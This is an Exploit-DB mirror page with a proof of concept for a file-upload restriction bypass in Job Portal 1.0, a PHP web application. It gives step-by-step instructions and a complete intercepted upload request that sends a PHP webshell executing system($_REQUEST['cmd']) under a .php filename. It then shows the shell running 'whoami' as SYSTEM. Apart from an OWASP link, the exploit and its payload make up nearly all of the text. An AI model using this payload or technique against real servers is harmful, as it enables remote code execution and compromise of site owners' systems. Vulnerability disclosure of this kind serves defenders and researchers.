Job Portal 1.0 – File Upload Restriction Bypass

  • 作者: Rafael Pedrero
    日期: 2023-05-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51440/
  • <!--
# Exploit Title: Job Portal 1.0 - File Upload Restriction Bypass
# Date: 27-06-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://phpgurukul.com/job-portal-project/
# Software Link:
https://phpgurukul.com/?smd_process_download=1&download_id=7855
# Version: 1.0
# Tested on: Windows 7 64 Bits / Windows 10 64 Bits
# CVE :
# Category: webapps


1. Description

File Upload Restriction Bypass vulnerabilities were found in Job Portal
1.0. This allows for an authenticated user to potentially obtain RCE via
webshell.


2. Proof of Concept

1. Go the user profile >> (/jobportal/applicant/)
2.- Select profile image and load a valid image.
3. Turn Burp/ZAP Intercept On
4. Select webshell - ex: shell.png
5. Alter request in the upload...
 Update 'filename' to desired extension. ex: shell.php
 Not neccesary change content type to 'image/png'

Example exploitation request:

====================================================================================================

POST http://127.0.0.1/jobportal/applicant/controller.php?action=photos
HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------57052814523281
Content-Length: 555
Origin: https://127.0.0.1
Connection: keep-alive
Referer: https://127.0.0.1/jobportal/applicant/index.php?view=view&id=
Cookie: PHPSESSID=qf9e02j0rda99cj91l36qcat34
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1

-----------------------------57052814523281
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1000000
-----------------------------57052814523281
Content-Disposition: form-data; name="photo"; filename="shell.php"
Content-Type: image/png

?PNG
...
<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"?>
IEND
-----------------------------57052814523281
Content-Disposition: form-data; name="savephoto"


-----------------------------57052814523281--

====================================================================================================

6. Send the request and visit your new webshell
 Ex: https://127.0.0.1/jobportal/applicant/photos/shell.php?cmd=whoami
 nt authority\system

3. Solution:

Patch:
https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

-->
    Python